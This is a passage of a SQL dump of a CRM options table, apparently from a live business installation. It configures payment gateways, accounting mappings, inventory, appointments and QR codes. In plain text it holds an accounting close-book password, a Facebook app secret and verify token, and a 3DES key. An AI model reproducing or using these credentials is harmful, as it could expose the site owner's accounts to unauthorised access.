(280, 'show_ticket_reminders_on_calendar', '1', 1),
(281, 'ticket_import_reply_only', '1', 1),
(282, 'visible_customer_profile_tabs', 'a:19:{s:7:\"profile\";b:0;s:8:\"contacts\";b:0;s:5:\"notes\";b:1;s:9:\"statement\";b:1;s:8:\"invoices\";b:1;s:8:\"payments\";b:1;s:9:\"proposals\";b:1;s:12:\"credit_notes\";b:1;s:9:\"estimates\";b:1;s:13:\"subscriptions\";b:0;s:8:\"expenses\";b:1;s:9:\"contracts\";b:1;s:8:\"projects\";b:1;s:5:\"tasks\";b:1;s:7:\"tickets\";b:1;s:11:\"attachments\";b:1;s:5:\"vault\";b:1;s:9:\"reminders\";b:1;s:3:\"map\";b:0;}', 0),
(283, 'show_project_on_invoice', '1', 1),
(284, 'show_project_on_estimate', '1', 1),
(285, 'staff_members_create_inline_lead_source', '1', 1),
(286, 'lead_unique_validation', '[\"email\",\"phonenumber\"]', 1),
(287, 'last_upgrade_copy_data', '', 1),
(288, 'custom_js_admin_scripts', '', 1),
(289, 'custom_js_customer_scripts', '0', 1),
(290, 'stripe_webhook_id', '', 1),
(291, 'stripe_webhook_signing_secret', '', 1),
(292, 'stripe_ideal_webhook_id', '', 1),
(293, 'stripe_ideal_webhook_signing_secret', '', 1),
(294, 'show_php_version_notice', '0', 0),
(295, 'recaptcha_ignore_ips', '', 1),
(296, 'show_task_reminders_on_calendar', '1', 1),
(297, 'customer_settings', 'true', 1),
(298, 'tasks_reminder_notification_hour', '1', 1),
(299, 'allow_primary_contact_to_manage_other_contacts', '0', 1),
(300, 'items_table_amounts_exclude_currency_symbol', '1', 1),
(301, 'round_off_task_timer_option', '1', 1),
(302, 'round_off_task_timer_time', '5', 1),
(303, 'bitly_access_token', '', 1),
(304, 'enable_support_menu_badges', '1', 1),
(305, 'attach_invoice_to_payment_receipt_email', '1', 1),
(306, 'invoice_due_notice_before', '2', 1),
(307, 'invoice_due_notice_resend_after', '3', 1),
(308, '_leads_settings', 'true', 1),
(309, 'show_estimate_request_in_customers_area', '1', 1),
(310, 'gdpr_enable_terms_and_conditions_estimate_request_form', '0', 1),
(312, 'identification_key', '1326466956164061950561c9ddf1a324e', 1),
(313, 'automatically_stop_task_timer_after_hours', '1', 1),
(314, 'automatically_assign_ticket_to_first_staff_responding', '0', 1),
(315, 'sms_clickatell_api_key', '', 1),
(316, 'sms_clickatell_active', '0', 1),
(317, 'sms_clickatell_initialized', '1', 1),
(318, 'sms_msg91_sender_id', '', 1),
(319, 'sms_msg91_api_type', 'api', 1),
(320, 'sms_msg91_auth_key', '', 1),
(321, 'sms_msg91_active', '0', 1),
(322, 'sms_msg91_initialized', '1', 1),
(323, 'sms_twilio_account_sid', '', 1),
(324, 'sms_twilio_auth_token', '', 1),
(325, 'sms_twilio_phone_number', '', 1),
(326, 'sms_twilio_active', '0', 1),
(327, 'sms_twilio_initialized', '1', 1),
(328, 'paymentmethod_authorize_acceptjs_active', '0', 1),
(329, 'paymentmethod_authorize_acceptjs_label', 'Authorize.net Accept.js', 1),
(330, 'paymentmethod_authorize_acceptjs_public_key', '', 0),
(331, 'paymentmethod_authorize_acceptjs_api_login_id', '', 0),
(332, 'paymentmethod_authorize_acceptjs_api_transaction_key', '', 0),
(333, 'paymentmethod_authorize_acceptjs_description_dashboard', 'Payment for Invoice {invoice_number}', 0),
(334, 'paymentmethod_authorize_acceptjs_currencies', 'USD', 0),
(335, 'paymentmethod_authorize_acceptjs_test_mode_enabled', '0', 0),
(336, 'paymentmethod_authorize_acceptjs_default_selected', '1', 1),
(337, 'paymentmethod_authorize_acceptjs_initialized', '1', 1),
(338, 'paymentmethod_instamojo_active', '0', 1),
(339, 'paymentmethod_instamojo_label', 'Instamojo', 1),
(340, 'paymentmethod_instamojo_api_key', '', 0),
(341, 'paymentmethod_instamojo_auth_token', '', 0),
(342, 'paymentmethod_instamojo_description_dashboard', 'Payment for Invoice {invoice_number}', 0),
(343, 'paymentmethod_instamojo_currencies', 'INR', 0),
(344, 'paymentmethod_instamojo_test_mode_enabled', '1', 0),
(345, 'paymentmethod_instamojo_default_selected', '1', 1),
(346, 'paymentmethod_instamojo_initialized', '1', 1),
(347, 'paymentmethod_mollie_active', '0', 1),
(348, 'paymentmethod_mollie_label', 'Mollie', 1),
(349, 'paymentmethod_mollie_api_key', '', 0),
(350, 'paymentmethod_mollie_description_dashboard', 'Payment for Invoice {invoice_number}', 0),
(351, 'paymentmethod_mollie_currencies', 'EUR', 0),
(352, 'paymentmethod_mollie_test_mode_enabled', '1', 0),
(353, 'paymentmethod_mollie_default_selected', '1', 1),
(354, 'paymentmethod_mollie_initialized', '1', 1),
(355, 'paymentmethod_paypal_braintree_active', '0', 1),
(356, 'paymentmethod_paypal_braintree_label', 'Braintree', 1),
(357, 'paymentmethod_paypal_braintree_merchant_id', '', 0),
(358, 'paymentmethod_paypal_braintree_api_public_key', '', 0),
(359, 'paymentmethod_paypal_braintree_api_private_key', '', 0),
(360, 'paymentmethod_paypal_braintree_currencies', 'USD', 0),
(361, 'paymentmethod_paypal_braintree_paypal_enabled', '1', 0),
(362, 'paymentmethod_paypal_braintree_test_mode_enabled', '1', 0),
(363, 'paymentmethod_paypal_braintree_default_selected', '1', 1),
(364, 'paymentmethod_paypal_braintree_initialized', '1', 1),
(365, 'paymentmethod_paypal_checkout_active', '0', 1),
(366, 'paymentmethod_paypal_checkout_label', 'Paypal Smart Checkout', 1),
(367, 'paymentmethod_paypal_checkout_client_id', '', 0),
(368, 'paymentmethod_paypal_checkout_secret', '', 0),
(369, 'paymentmethod_paypal_checkout_payment_description', 'Payment for Invoice {invoice_number}', 0),
(370, 'paymentmethod_paypal_checkout_currencies', 'USD,CAD,EUR', 0),
(371, 'paymentmethod_paypal_checkout_test_mode_enabled', '1', 0),
(372, 'paymentmethod_paypal_checkout_default_selected', '1', 1),
(373, 'paymentmethod_paypal_checkout_initialized', '1', 1),
(374, 'paymentmethod_paypal_active', '0', 1),
(375, 'paymentmethod_paypal_label', 'Paypal', 1),
(376, 'paymentmethod_paypal_username', '', 0),
(377, 'paymentmethod_paypal_password', '', 0),
(378, 'paymentmethod_paypal_signature', '', 0),
(379, 'paymentmethod_paypal_description_dashboard', 'Payment for Invoice {invoice_number}', 0),
(380, 'paymentmethod_paypal_currencies', 'EUR,USD', 0),
(381, 'paymentmethod_paypal_test_mode_enabled', '1', 0),
(382, 'paymentmethod_paypal_default_selected', '1', 1),
(383, 'paymentmethod_paypal_initialized', '1', 1),
(384, 'paymentmethod_payu_money_active', '0', 1),
(385, 'paymentmethod_payu_money_label', 'PayU Money', 1),
(386, 'paymentmethod_payu_money_key', '', 0),
(387, 'paymentmethod_payu_money_salt', '', 0),
(388, 'paymentmethod_payu_money_description_dashboard', 'Payment for Invoice {invoice_number}', 0),
(389, 'paymentmethod_payu_money_currencies', 'INR', 0),
(390, 'paymentmethod_payu_money_test_mode_enabled', '1', 0),
(391, 'paymentmethod_payu_money_default_selected', '1', 1),
(392, 'paymentmethod_payu_money_initialized', '1', 1),
(393, 'paymentmethod_stripe_active', '0', 1),
(394, 'paymentmethod_stripe_label', 'Stripe Checkout', 1),
(395, 'paymentmethod_stripe_api_publishable_key', '', 0),
(396, 'paymentmethod_stripe_api_secret_key', '', 0),
(397, 'paymentmethod_stripe_description_dashboard', 'Payment for Invoice {invoice_number}', 0),
(398, 'paymentmethod_stripe_currencies', 'USD,CAD', 0),
(399, 'paymentmethod_stripe_allow_primary_contact_to_update_credit_card', '1', 0),
(400, 'paymentmethod_stripe_default_selected', '1', 1),
(401, 'paymentmethod_stripe_initialized', '1', 1),
(402, 'paymentmethod_stripe_ideal_active', '0', 1),
(403, 'paymentmethod_stripe_ideal_label', 'Stripe iDEAL', 1),
(404, 'paymentmethod_stripe_ideal_api_secret_key', '', 0),
(405, 'paymentmethod_stripe_ideal_api_publishable_key', '', 0),
(406, 'paymentmethod_stripe_ideal_description_dashboard', 'Payment for Invoice {invoice_number}', 0),
(407, 'paymentmethod_stripe_ideal_statement_descriptor', 'Payment for Invoice {invoice_number}', 0),
(408, 'paymentmethod_stripe_ideal_currencies', 'EUR', 0),
(409, 'paymentmethod_stripe_ideal_default_selected', '1', 1),
(410, 'paymentmethod_stripe_ideal_initialized', '1', 1),
(411, 'paymentmethod_two_checkout_active', '0', 1),
(412, 'paymentmethod_two_checkout_label', '2Checkout', 1),
(413, 'paymentmethod_two_checkout_merchant_code', '', 0),
(414, 'paymentmethod_two_checkout_secret_key', '', 0),
(415, 'paymentmethod_two_checkout_description', 'Payment for Invoice {invoice_number}', 0),
(416, 'paymentmethod_two_checkout_currencies', 'USD, EUR, GBP', 0),
(417, 'paymentmethod_two_checkout_test_mode_enabled', '1', 0),
(418, 'paymentmethod_two_checkout_default_selected', '1', 1),
(419, 'paymentmethod_two_checkout_initialized', '1', 1),
(420, 'sms_trigger_invoice_overdue_notice', '', 0),
(421, 'sms_trigger_invoice_due_notice', '', 0),
(422, 'sms_trigger_invoice_payment_recorded', '', 0),
(423, 'sms_trigger_estimate_expiration_reminder', '', 0),
(424, 'sms_trigger_proposal_expiration_reminder', '', 0),
(425, 'sms_trigger_proposal_new_comment_to_customer', '', 0),
(426, 'sms_trigger_proposal_new_comment_to_staff', '', 0),
(427, 'sms_trigger_contract_new_comment_to_customer', '', 0),
(428, 'sms_trigger_contract_new_comment_to_staff', '', 0),
(429, 'sms_trigger_contract_expiration_reminder', '', 0),
(430, 'sms_trigger_staff_reminder', '', 0),
(431, 'auto_backup_enabled', '1', 1),
(432, 'auto_backup_every', '7', 1),
(433, 'last_auto_backup', '1709621102', 1),
(434, 'delete_backups_older_then', '20', 1),
(435, 'auto_backup_hour', '6', 1),
(436, 'aside_menu_active', '[]', 1),
(437, 'setup_menu_active', '{\"staff\":{\"id\":\"staff\",\"icon\":\"\",\"disabled\":\"false\",\"position\":\"5\"},\"customers\":{\"id\":\"customers\",\"icon\":\"\",\"disabled\":\"false\",\"position\":\"10\",\"children\":{\"customer-groups\":{\"disabled\":\"false\",\"id\":\"customer-groups\",\"icon\":\"\",\"position\":\"5\"}}},\"support\":{\"id\":\"support\",\"icon\":\"\",\"disabled\":\"false\",\"position\":\"15\",\"children\":{\"departments\":{\"disabled\":\"false\",\"id\":\"departments\",\"icon\":\"\",\"position\":\"5\"},\"tickets-predefined-replies\":{\"disabled\":\"false\",\"id\":\"tickets-predefined-replies\",\"icon\":\"\",\"position\":\"10\"},\"tickets-priorities\":{\"disabled\":\"false\",\"id\":\"tickets-priorities\",\"icon\":\"\",\"position\":\"15\"},\"tickets-statuses\":{\"disabled\":\"false\",\"id\":\"tickets-statuses\",\"icon\":\"\",\"position\":\"20\"},\"tickets-services\":{\"disabled\":\"false\",\"id\":\"tickets-services\",\"icon\":\"\",\"position\":\"25\"},\"tickets-spam-filters\":{\"disabled\":\"false\",\"id\":\"tickets-spam-filters\",\"icon\":\"\",\"position\":\"30\"}}},\"leads\":{\"id\":\"leads\",\"icon\":\"\",\"disabled\":\"false\",\"position\":\"20\",\"children\":{\"leads-sources\":{\"disabled\":\"false\",\"id\":\"leads-sources\",\"icon\":\"\",\"position\":\"5\"},\"leads-statuses\":{\"disabled\":\"false\",\"id\":\"leads-statuses\",\"icon\":\"\",\"position\":\"10\"},\"leads-email-integration\":{\"disabled\":\"false\",\"id\":\"leads-email-integration\",\"icon\":\"\",\"position\":\"15\"},\"web-to-lead\":{\"disabled\":\"false\",\"id\":\"web-to-lead\",\"icon\":\"\",\"position\":\"20\"}}},\"finance\":{\"id\":\"finance\",\"icon\":\"\",\"disabled\":\"false\",\"position\":\"25\",\"children\":{\"taxes\":{\"disabled\":\"false\",\"id\":\"taxes\",\"icon\":\"\",\"position\":\"5\"},\"currencies\":{\"disabled\":\"false\",\"id\":\"currencies\",\"icon\":\"\",\"position\":\"10\"},\"payment-modes\":{\"disabled\":\"false\",\"id\":\"payment-modes\",\"icon\":\"\",\"position\":\"15\"},\"expenses-categories\":{\"disabled\":\"false\",\"id\":\"expenses-categories\",\"icon\":\"\",\"position\":\"20\"}}},\"settings\":{\"id\":\"settings\",\"icon\":\"\",\"disabled\":\"false\",\"position\":\"30\"},\"contracts\":{\"id\":\"contracts\",\"icon\":\"\",\"disabled\":\"false\",\"position\":\"35\",\"children\":{\"contracts-types\":{\"disabled\":\"false\",\"id\":\"contracts-types\",\"icon\":\"\",\"position\":\"5\"}}},\"estimate_request\":{\"id\":\"estimate_request\",\"icon\":\"\",\"disabled\":\"false\",\"position\":\"40\",\"children\":{\"estimate-request-forms\":{\"disabled\":\"false\",\"id\":\"estimate-request-forms\",\"icon\":\"\",\"position\":\"5\"},\"estimate-request-statuses\":{\"disabled\":\"false\",\"id\":\"estimate-request-statuses\",\"icon\":\"\",\"position\":\"10\"}}},\"modules\":{\"id\":\"modules\",\"icon\":\"\",\"disabled\":\"false\",\"position\":\"45\"},\"email-templates\":{\"id\":\"email-templates\",\"icon\":\"\",\"disabled\":\"false\",\"position\":\"50\"},\"gdpr\":{\"id\":\"gdpr\",\"icon\":\"\",\"disabled\":\"false\",\"position\":\"55\"},\"roles\":{\"id\":\"roles\",\"icon\":\"\",\"disabled\":\"false\",\"position\":\"60\"},\"custom-fields\":{\"id\":\"custom-fields\",\"icon\":\"\",\"disabled\":\"false\",\"position\":\"65\"},\"menu-options\":{\"id\":\"menu-options\",\"icon\":\"\",\"disabled\":\"false\",\"position\":\"70\",\"children\":{\"main-menu-options\":{\"disabled\":\"false\",\"id\":\"main-menu-options\",\"icon\":\"\",\"position\":\"5\"},\"setup-menu-options\":{\"disabled\":\"false\",\"id\":\"setup-menu-options\",\"icon\":\"\",\"position\":\"10\"}}},\"theme-style\":{\"id\":\"theme-style\",\"icon\":\"\",\"disabled\":\"false\",\"position\":\"75\"},\"reminder-options\":{\"id\":\"reminder-options\",\"icon\":\"\",\"disabled\":\"false\",\"position\":\"80\",\"children\":{\"reminder-service\":{\"disabled\":\"false\",\"id\":\"reminder-service\",\"icon\":\"\",\"position\":\"5\"}}}}', 1),
(438, 'theme_style', '[]', 1),
(439, 'theme_style_custom_admin_area', '', 1),
(440, 'theme_style_custom_clients_area', '', 1),
(441, 'theme_style_custom_clients_and_admin_area', '', 1),
(442, 'survey_send_emails_per_cron_run', '100', 1),
(443, 'last_survey_send_cron', '1695738609', 1),
(447, 'warehouse_selling_price_rule_profif_ratio', '50', 1),
(448, 'profit_rate_by_purchase_price_sale', '1', 1),
(449, 'warehouse_the_fractional_part', '0', 1),
(450, 'warehouse_integer_part', '0', 1),
(451, 'auto_create_goods_received', '1', 1),
(452, 'auto_create_goods_delivery', '1', 1),
(453, 'goods_receipt_warehouse', '1', 1),
(454, 'barcode_with_sku_code', '1', 1),
(455, 'revert_goods_receipt_goods_delivery', '1', 1),
(456, 'cancelled_invoice_reverse_inventory_delivery_voucher', '1', 1),
(457, 'uncancelled_invoice_create_inventory_delivery_voucher', '1', 1),
(458, 'inventory_auto_operations_hour', '8', 1),
(459, 'automatically_send_items_expired_before', '3', 1),
(460, 'inventorys_cronjob_active', '1', 1),
(461, 'inventory_cronjob_notification_recipients', '', 1),
(462, 'inventory_received_number_prefix', 'NK', 1),
(463, 'next_inventory_received_mumber', '39', 1),
(464, 'inventory_delivery_number_prefix', 'XK', 1),
(465, 'next_inventory_delivery_mumber', '387', 1),
(466, 'internal_delivery_number_prefix', 'ID', 1),
(467, 'next_internal_delivery_mumber', '1', 1),
(468, 'item_sku_prefix', 'PN', 1),
(469, 'goods_receipt_required_po', '1', 1),
(470, 'goods_delivery_required_po', '1', 1),
(471, 'goods_delivery_pdf_display', '1', 1),
(472, 'appointly_responsible_person', '2', 1),
(473, 'callbacks_responsible_person', '2', 1),
(474, 'appointly_show_clients_schedule_button', '1', 1),
(475, 'appointly_tab_on_clients_page', '1', 1),
(476, 'appointly_also_delete_in_google_calendar', '1', 1),
(477, 'appointments_show_past_times', '1', 1),
(478, 'appointments_disable_weekends', '1', 1),
(479, 'appointly_client_meeting_approved_default', '1', 1),
(480, 'appointly_google_client_secret', 'https://hgphome.com/appointly/google/auth/oauth', 1),
(481, 'appointly_outlook_client_id', 'https://hgphome.com/admin/appointly/appointments', 1),
(482, 'appointly_view_all_in_calendar', '1', 1),
(483, 'appointly_available_hours', '[\"08:00\",\"08:30\",\"09:00\",\"09:30\",\"10:00\",\"10:30\",\"11:00\",\"11:30\",\"12:00\",\"12:30\",\"13:00\",\"13:30\",\"14:00\",\"14:30\",\"15:00\",\"15:30\",\"16:00\",\"16:30\",\"17:00\"]', 1),
(484, 'appointly_default_feedbacks', '[\"0\",\"1\",\"2\",\"3\",\"4\",\"5\",\"6\"]', 1),
(485, 'appointly_busy_times_enabled', '1', 1),
(486, 'callbacks_mode_enabled', '1', 1),
(487, 'appointly_appointments_recaptcha', '0', 1),
(491, 'sms_trigger_appointly_appointment_approved_send_to_client', '', 0),
(492, 'sms_trigger_appointly_appointment_cancelled_to_client', '', 0),
(493, 'sms_trigger_appointly_appointment_reminder_to_client', '', 0),
(494, 'acc_first_month_of_financial_year', 'January', 1),
(495, 'acc_first_month_of_tax_year', 'same_as_financial_year', 1),
(496, 'acc_accounting_method', 'accrual', 1),
(497, 'acc_close_the_books', '0', 1),
(498, 'acc_allow_changes_after_viewing', 'allow_changes_after_viewing_a_warning', 1),
(499, 'acc_close_book_password', 'Hogia@!2368', 1),
(500, 'acc_close_book_passwordr', '', 1),
(501, 'acc_enable_account_numbers', '0', 1),
(502, 'acc_show_account_numbers', '0', 1),
(503, 'acc_closing_date', '0', 1),
(504, 'acc_add_default_account', '0', 1),
(505, 'acc_add_default_account_new', '0', 1),
(506, 'acc_invoice_automatic_conversion', '1', 1),
(507, 'acc_payment_automatic_conversion', '1', 1),
(508, 'acc_expense_automatic_conversion', '1', 1),
(509, 'acc_tax_automatic_conversion', '1', 1),
(510, 'acc_invoice_payment_account', '66', 1),
(511, 'acc_invoice_deposit_to', '1', 1),
(512, 'acc_payment_payment_account', '1', 1),
(513, 'acc_payment_deposit_to', '13', 1),
(514, 'acc_expense_payment_account', '13', 1),
(515, 'acc_expense_deposit_to', '80', 1),
(516, 'acc_tax_payment_account', '29', 1),
(517, 'acc_tax_deposit_to', '1', 1),
(518, 'acc_expense_tax_payment_account', '13', 1),
(519, 'acc_expense_tax_deposit_to', '29', 1),
(520, 'acc_active_payment_mode_mapping', '1', 1),
(521, 'acc_active_expense_category_mapping', '1', 1),
(522, 'acc_payment_expense_automatic_conversion', '1', 1),
(523, 'acc_payment_sale_automatic_conversion', '1', 1),
(524, 'acc_expense_payment_payment_account', '1', 1),
(525, 'acc_expense_payment_deposit_to', '1', 1),
(526, 'acc_pl_total_insurance_automatic_conversion', '1', 1),
(527, 'acc_pl_total_insurance_payment_account', '13', 1),
(528, 'acc_pl_total_insurance_deposit_to', '32', 1),
(529, 'acc_pl_tax_paye_automatic_conversion', '1', 1),
(530, 'acc_pl_tax_paye_payment_account', '13', 1),
(531, 'acc_pl_tax_paye_deposit_to', '28', 1),
(532, 'acc_pl_net_pay_automatic_conversion', '1', 1),
(533, 'acc_pl_net_pay_payment_account', '13', 1),
(534, 'acc_pl_net_pay_deposit_to', '56', 1),
(535, 'acc_wh_stock_import_automatic_conversion', '1', 1),
(536, 'acc_wh_stock_import_payment_account', '87', 1),
(537, 'acc_wh_stock_import_deposit_to', '37', 1),
(538, 'acc_wh_stock_export_automatic_conversion', '1', 1),
(539, 'acc_wh_stock_export_payment_account', '37', 1),
(540, 'acc_wh_stock_export_deposit_to', '1', 1),
(541, 'acc_wh_loss_adjustment_automatic_conversion', '1', 1),
(542, 'acc_wh_decrease_payment_account', '37', 1),
(543, 'acc_wh_decrease_deposit_to', '1', 1),
(544, 'acc_wh_increase_payment_account', '87', 1),
(545, 'acc_wh_increase_deposit_to', '37', 1),
(546, 'acc_wh_opening_stock_automatic_conversion', '1', 1),
(547, 'acc_wh_opening_stock_payment_account', '88', 1),
(548, 'acc_wh_opening_stock_deposit_to', '37', 1),
(549, 'acc_pur_order_automatic_conversion', '1', 1),
(550, 'acc_pur_order_payment_account', '13', 1),
(551, 'acc_pur_order_deposit_to', '80', 1),
(552, 'acc_pur_payment_automatic_conversion', '1', 1),
(553, 'acc_pur_payment_payment_account', '16', 1),
(554, 'acc_pur_payment_deposit_to', '37', 1),
(555, 'calculate_recurring_invoice', '0', 1),
(556, 'reminder_for_completed_but_not_billed_tasks', '1', 1),
(557, 'staff_notify_completed_but_not_billed_tasks', '[\"1\",\"2\"]', 1),
(558, 'reminder_for_completed_but_not_billed_tasks_days', '[\"Monday\"]', 1),
(559, 'tasks_reminder_notification_last_notified_day', 'Monday', 1),
(561, 'last_updated_date', '1709614768', 1),
(562, 'sms_twilio_sender_id', '', 1),
(563, 'pur_invoice_auto_operations_hour', '21', 1),
(564, 'next_debit_note_number', '1', 1),
(565, 'debit_note_number_format', '1', 1),
(566, 'debit_note_prefix', 'DN-', 1),
(567, 'show_purchase_tax_column', '0', 1),
(568, 'po_only_prefix_and_number', '1', 1),
(569, 'cr_date_cronjob_currency_rates', '2023-09-22', 1),
(570, 'cr_automatically_get_currency_rate', '1', 1),
(571, 'cr_global_amount_expiration', '0', 1),
(572, 'pur_return_request_within_x_day', '', 1),
(573, 'pur_fee_for_return_order', '', 1),
(574, 'pur_return_policies_information', '', 1),
(575, 'pur_order_return_number_prefix', 'OReturn', 1),
(576, 'next_pur_order_return_number', '1', 1),
(577, 'send_email_welcome_for_new_contact', '0', 1),
(578, 'reset_purchase_order_number_every_month', '1', 1),
(579, 'acc_credit_note_automatic_conversion', '1', 1),
(580, 'acc_credit_note_payment_account', '1', 1),
(581, 'acc_credit_note_deposit_to', '13', 1),
(582, 'staff_sync_orders', '1,2', 1),
(583, 'minute_sync_orders', '', 1),
(584, 'time_cron_woo', '', 1),
(585, 'minute_sync', '', 1),
(586, 'sync_omni_sales_products', '1', 1),
(587, 'sync_omni_sales_orders', '1', 1),
(588, 'sync_omni_sales_inventorys', '1', 1),
(589, 'sync_omni_sales_description', '0', 1),
(590, 'sync_omni_sales_images', '0', 1),
(591, 'price_crm_woo', '0', 1),
(592, 'product_info_enable_disable', '0', 1),
(593, 'product_info_image_enable_disable', '0', 1),
(594, 'minute_sync_product_info_time1', '', 1),
(595, 'minute_sync_inventory_info_time2', '', 1),
(596, 'minute_sync_price_time3', '', 1),
(597, 'minute_sync_decriptions_time4', '', 1),
(598, 'minute_sync_images_time5', '', 1),
(599, 'minute_sync_product_info_time7', '', 1),
(600, 'minute_sync_product_info_images_time8', '', 1),
(601, 'records_time1', '12:25:47', 1),
(602, 'records_time2', '12:25:47', 1),
(603, 'records_time3', '12:25:47', 1),
(604, 'records_time4', '12:25:47', 1),
(605, 'records_time5', '12:25:47', 1),
(606, 'records_time6', '12:25:47', 1),
(607, 'records_time7', '12:25:47', 1),
(608, 'records_time8', '12:25:47', 1),
(609, 'status_sync', '0', 1),
(610, 'invoice_sync_configuration', '1', 1),
(611, 'omni_show_products_by_department', '0', 1),
(612, 'bill_header_pos', '<div class=\"cls_003\" style=\"text-align: center;\"><span class=\"cls_003\"><strong>PURCHASE RECEIPT</strong></span></div>', 1),
(613, 'bill_footer_pos', '<div class=\"cls_004\"><span class=\"cls_004\">Thank you for shopping with us. Please come again</span></div>', 1),
(614, 'omni_default_seller', '', 1),
(615, 'number_of_days_to_save_diary_sync', '30', 1),
(616, 'omni_3des_key', '3des1213141516ahiocrth', 1),
(617, 'omni_allow_showing_shipment_in_public_link', '1', 1),
(618, 'omni_return_order_prefix', 'RE', 1),
(619, 'omni_return_request_within_x_day', '30', 1),
(620, 'omni_fee_for_return_order', '0', 1),
(621, 'omni_refund_loyaty_point', '1', 1),
(622, 'omni_return_policies_information', '', 1),
(623, 'omni_pos_shipping_fee', '0', 1),
(624, 'omni_portal_shipping_fee', '0', 1),
(625, 'omni_manual_shipping_fee', '0', 1),
(626, 'omni_order_statuses_are_allowed_to_sync', '', 1),
(627, 'omni_display_shopping_cart', '1', 1),
(628, 'loyalty_setting', '1', 1),
(629, 'display_product_name_when_print_barcode', '0', 1),
(630, 'show_item_cf_on_pdf', '1', 1),
(631, 'goods_delivery_pdf_display_outstanding', '1', 1),
(632, 'goods_delivery_pdf_display_warehouse_lotnumber_bottom_infor', '1', 1),
(633, 'packing_list_number_prefix', 'PL', 1),
(634, 'next_packing_list_number', '2', 1),
(635, 'wh_return_request_within_x_day', '30', 1),
(636, 'wh_fee_for_return_order', '0', 1),
(637, 'wh_return_policies_information', '<p>Phiếu trả hàng - Tạo mới</p>', 1),
(638, 'wh_refund_loyaty_point', '1', 1),
(639, 'order_return_number_prefix', 'ReReturn', 1),
(640, 'next_order_return_number', '1', 1),
(641, 'e_order_return_number_prefix', 'DEReturn', 1),
(642, 'e_next_order_return_number', '1', 1),
(643, 'warehouse_receive_return_order ', '1', 1),
(644, 'wh_display_shipment_on_client_portal', '0', 1),
(645, 'wh_on_total_items', '200', 1),
(646, 'wh_products_by_serial', '0', 1),
(647, 'qr_code_width', '50', 1),
(648, 'qr_code_height', '50', 1),
(649, 'invoice_qr_code_x_position', '25', 1),
(650, 'invoice_qr_code_y_position', '180', 1),
(651, 'payment_qr_code_x_position', '150', 1),
(652, 'payment_qr_code_y_position', '100', 1),
(653, 'credit_note_qr_code_x_position', '', 1),
(654, 'credit_note_qr_code_y_position', '', 1),
(655, 'proposal_qr_code_x_position', '150', 1),
(656, 'proposal_qr_code_y_position', '100', 1),
(657, 'estimate_qr_code_x_position', '150', 1),
(658, 'estimate_qr_code_y_position', '100', 1),
(659, 'show_invoice_qr_code', '1', 1),
(660, 'show_payment_qr_code', '1', 1),
(661, 'show_credit_note_qr_code', '1', 1),
(662, 'show_estimate_qr_code', '1', 1),
(663, 'show_proposal_qr_code', '1', 1),
(664, 'invoice_qr_code_info', '{logo_image_with_url}\r\n{invoice_link} \r\n{invoice_number}\r\n{invoice_date}', 1),
(665, 'payment_qr_code_info', '{invoice_link}', 1),
(666, 'credit_note_qr_code_info', '{credit_note_date}\r\n{credit_note_number}\r\n{credit_note_total}', 1),
(667, 'estimate_qr_code_info', '{estimate_link}\r\n{estimate_number}\r\n{estimate_expirydate}\r\n{estimate_status}\r\n{estimate_total}\r\n\r\n{email_signature}', 1),
(668, 'proposal_qr_code_info', '{proposal_link}', 1),
(669, 'reminder_queries_run', '1', 1),
(670, 'show_project_on_proposal', '1', 1),
(671, 'show_pdf_signature_proposal', '0', 1),
(672, 'enable_honeypot_spam_validation', '0', 1),
(673, 'staff_related_ticket_notification_to_assignee_only', '0', 1),
(678, 'sa_wh_products_by_serial', '0', 1),
(679, 'ma_insert_email_template_default', '1', 1),
(683, 'current_perfex_version', '291', 1),
(684, 'excluded_uri_for_facebook_leads_integration_once', '1', 1),
(685, 'spreadsheet_staff_notification', '0', 1),
(686, 'spreadsheet_email_templates_staff', '0', 1),
(687, 'spreadsheet_client_notification', '0', 1),
(688, 'spreadsheet_email_templates_client', '0', 1),
(689, 'appId', '312437779345446', 1),
(690, 'appSecret', '50f73850a2c6d85b20e795bcacb19d71', 1),
(691, 'verifytoken', 'token654321', 1),
(692, 'subscribed_pages', '[]', 1),
(693, 'facebook_lead_source', '2', 1),
(703, 'qr_code_invoice_base64_encryption', '1', 1),
(704, 'automatically_set_logged_in_staff_sales_agent', '1', 1),
(705, 'contract_sign_reminder_every_days', '0', 1),
(706, 'v310_incompatible_tables', '[]', 1),
(711, 'paymentmethod_instamojo_fee_fixed', '0', 0),
(712, 'paymentmethod_instamojo_fee_percent', '0', 0),
(713, 'paymentmethod_paypal_checkout_fee_fixed', '0', 0),
(714, 'paymentmethod_paypal_checkout_fee_percent', '0', 0),
(715, 'paymentmethod_paypal_fee_fixed', '0', 0),
(716, 'paymentmethod_paypal_fee_percent', '0', 0),
(717, 'paymentmethod_payu_money_fee_fixed', '0', 0),
(718, 'paymentmethod_payu_money_fee_percent', '0', 0),
(719, 'paymentmethod_stripe_fee_fixed', '0', 0),
(720, 'paymentmethod_stripe_fee_percent', '0', 0),
(721, 'paymentmethod_two_checkout_fee_fixed', '0', 0),
(722, 'paymentmethod_two_checkout_fee_percent', '0', 0),
(723, 'sms_trigger_contract_sign_reminder_to_customer', '', 0),
(724, 'microsoft_mail_client_id', '', 1),
(725, 'microsoft_mail_client_secret', '', 1),
(726, 'microsoft_mail_azure_tenant_id', '', 1),
(727, 'google_mail_client_id', '', 1),
(728, 'google_mail_client_secret', '', 1),
(729, 'allow_non_admin_members_to_delete_tickets_and_replies', '0', 1),
(730, 'required_register_fields', '[]', 1),
(731, 'upgraded_from_version', '311', 1),
(732, 'invoice_item_table_custom_style', '[{\"id\":\"invoice_heading_row_bg_color\",\"color\":\"#025488\"},{\"id\":\"invoice_heading_row_text_color\",\"color\":\"\"},{\"id\":\"invoice_odd_rows_bg_color\",\"color\":\"#f1f1f1\"},{\"id\":\"invoice_odd_rows_text_color\",\"color\":\"\"},{\"id\":\"invoice_even_rows_bg_color\",\"color\":\"\"},{\"id\":\"invoice_even_rows_text_color\",\"color\":\"\"},{\"id\":\"invoice_total_row_bg_color\",\"color\":\"\"},{\"id\":\"invoice_total_row_text_color\",\"color\":\"\"}]', 1),
